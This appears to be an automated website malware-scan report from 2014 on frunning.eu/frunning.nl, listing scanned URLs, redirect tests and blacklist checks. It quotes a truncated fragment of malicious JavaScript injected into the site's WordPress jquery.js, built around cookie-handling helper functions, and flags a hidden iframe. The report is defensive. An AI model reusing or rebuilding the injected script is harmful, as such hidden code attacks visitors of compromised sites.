Scanned pages/files
Request | Server response | Status |
http://frunning.eu/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:46 GMT Location: http://www.frunning.nl Server: Apache Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nl/ | 200 OK Content-Length: 11551 Content-Type: text/html | clean |
http://www.frunning.nl/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 96696 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Art_protection() {
    function setCookie(name, value, expires) {
        var date = new Date( new Date().getTime() + expires*1000 );
        document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
    }
    function takeOrlondo(name) {
        var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
        return nachos ? decodeURIComponent(nachos[1]) : undefined;
    }
    var cookie = takeOrlondo(
jQuery.noConflict();
Antivirus reports:
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/bootstrap/js/bootstrap.js | 200 OK Content-Length: 61962 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/jquery.fitvids.js | 200 OK Content-Length: 2644 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/okvideo.js | 200 OK Content-Length: 9779 Content-Type: application/javascript | suspicious |
Hidden iFrame found.
style: hidden
src: http://player.vimeo.com/video/
<iframe src="http://player.vimeo.com/video/' + base.options.video.id + '?api=1&js_api=1&title=0&byline=0&portrait=0&playbar=0&loop=' + base.options.loop + '&autoplay=1&player_id=okplayer" frameborder="0" style="' + $(this).attr('style') + 'visibility:hidden;background-color:black;" id="' + $(this).attr('id') + '">
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/video.js | 200 OK Content-Length: 55392 Content-Type: application/javascript | clean |
http://frunning.eu//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:54 GMT Location: http://www.frunning.nlajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ Server: Apache Content-Length: 353 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nlajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | 404 Not Found Content-Length: 1467 Content-Type: text/html | clean |
http://www.frunning.nlajax.googleapis.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.frunning.nlajax.googleapis.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/bigvideo.js | 200 OK Content-Length: 10081 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/script.js | 200 OK Content-Length: 37553 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/modernizr.min.js | 200 OK Content-Length: 5466 Content-Type: application/javascript | clean |
http://frunning.eu//www.google.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:56 GMT Location: http://www.frunning.nlwww.google.com/ Server: Apache Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nlwww.google.com/ | 500 Can't connect to www.frunning.nlwww.google.com:80 (Bad hostname) Content-Length: 190 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frunning.eu
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 10 Oct 2014 13:24:46 GMT
Location: http://www.frunning.nl
Server: Apache
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frunning.eu
Referer: http://www.google.com/search?q=frunning.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frunning.eu
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frunning.eu/
Result: frunning.eu is not infected or malware details are not published yet.